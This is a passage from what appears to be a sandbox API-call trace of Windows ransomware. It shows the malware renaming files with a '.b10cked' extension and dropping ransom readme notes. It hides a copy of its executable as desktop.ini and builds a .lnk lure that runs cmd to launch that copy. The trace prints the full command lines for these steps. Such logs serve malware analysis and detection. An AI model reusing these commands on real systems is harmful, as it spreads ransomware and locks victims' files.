lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3760 [0162.164] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0162.164] CloseHandle (hObject=0x114) returned 1 [0162.165] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX") returned 0x3c [0162.166] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0162.166] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELO~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\ENVELOPR.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x8f0, dwThreadId=0x8e4)) returned 1 [0162.171] CloseHandle (hObject=0x1b4) returned 1 [0162.171] CloseHandle (hObject=0x114) returned 1 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\") returned 0x34 [0162.171] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\1036\\", cchCount2=52) returned 3 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0162.171] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0162.171] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0162.171] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0162.172] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0162.172] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0162.172] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0162.172] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0162.172] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0162.172] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x114, dwProcessId=0xfe8, dwThreadId=0x81c)) returned 1 [0162.179] CloseHandle (hObject=0x1b4) returned 1 [0162.179] CloseHandle (hObject=0x114) returned 1 [0162.179] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\bl0cked-readme.rtf")) returned 0xffffffff [0162.179] GetLastError () returned 0x2 [0162.179] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0162.183] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\bl0cked-readme.rtf")) returned 0x2020 [0162.183] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0162.183] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0162.183] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0162.183] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0162.183] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0162.184] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0162.184] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0162.184] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0162.184] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0162.184] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0162.184] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082") returned 0x2f [0162.185] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x17a | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x17a [0162.185] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0162.185] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x1b4, dwProcessId=0xef8, dwThreadId=0xfb0)) returned 1 [0162.248] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0163.221] CloseHandle (hObject=0x114) returned 1 [0163.221] CloseHandle (hObject=0x1b4) returned 1 [0163.221] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0163.221] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0163.221] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0163.221] GetTickCount () returned 0x316ba [0163.221] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=22001035420) returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x78\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x41\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x35\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x46\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x50\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x42\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x52\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0163.221] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0163.221] CharUpperBuffW (in: lpsz="explorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x65 | out: lpsz="EXPLORER.EXE \"[DIR_NAME]\" & TYPE \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x65 [0163.221] CharUpperBuffW (in: lpsz="[DIR_NAME]", cchLength=0xa | out: lpsz="[DIR_NAME]") returned 0xa [0163.221] CharUpperBuffW (in: lpsz="explorer.exe \"3082\" & type \"3082\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x59 | out: lpsz="EXPLORER.EXE \"3082\" & TYPE \"3082\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x59 [0163.221] CharUpperBuffW (in: lpsz="[HID_NAME]", cchLength=0xa | out: lpsz="[HID_NAME]") returned 0xa [0163.222] CharUpperBuffW (in: lpsz="explorer.exe \"3082\" & type \"3082\\desktop.ini\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"", cchLength=0x5a | out: lpsz="EXPLORER.EXE \"3082\" & TYPE \"3082\\DESKTOP.INI\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"") returned 0x5a [0163.222] CharUpperBuffW (in: lpsz="[EXE_NAME]", cchLength=0xa | out: lpsz="[EXE_NAME]") returned 0xa [0163.222] CoInitialize (pvReserved=0x0) returned 0x0 [0163.222] CoCreateInstance (in: rclsid=0x4e06a4*(Data1=0x21401, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x5, riid=0x4b0dcc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x12fc10 | out: ppv=0x12fc10*=0x1d3e18) returned 0x0 [0163.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d36fc*(Data1=0x214f9, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3df0) returned 0x0 [0163.223] ShellLink:IUnknown:QueryInterface (in: This=0x1d3e18, riid=0x4d370c*(Data1=0x10b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x12fbc8 | out: ppvObject=0x12fbc8*=0x1d3dfc) returned 0x0 [0163.223] ShellLink:IShellLinkW:SetPath (This=0x1d3df0, pszFile="%SystemRoot%\\system32\\cmd.exe") returned 0x0 [0163.224] ShellLink:IShellLinkW:SetArguments (This=0x1d3df0, pszArgs="/C explorer.exe \"3082\" & type \"3082\\desktop.ini\" > \"%TEMP%\\xA5FPBmR.exe\" && \"%TEMP%\\xA5FPBmR.exe\"") returned 0x0 [0163.225] ShellLink:IShellLinkW:SetWorkingDirectory (This=0x1d3df0, pszDir="%CD%") returned 0x0 [0163.225] ShellLink:IShellLinkW:SetIconLocation (This=0x1d3df0, pszIconPath="%SystemRoot%\\system32\\shell32.dll", iIcon=3) returned 0x0 [0163.225] ShellLink:IShellLinkW:SetShowCmd (This=0x1d3df0, iShowCmd=7) returned 0x0 [0163.225] ShellLink:IPersistFile:Save (This=0x1d3dfc, pszFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082.lnk", fRemember=0) returned 0x0 [0163.232] ShellLink:IUnknown:Release (This=0x1d3dfc) returned 0x2 [0163.232] ShellLink:IUnknown:Release (This=0x1d3df0) returned 0x1 [0163.232] ShellLink:IUnknown:Release (This=0x1d3e18) returned 0x0 [0163.233] CoUninitialize () [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0163.233] ReleaseMutex (hMutex=0xf8) returned 1 [0163.233] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22002313805) returned 1 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.234] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xb960 [0163.235] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 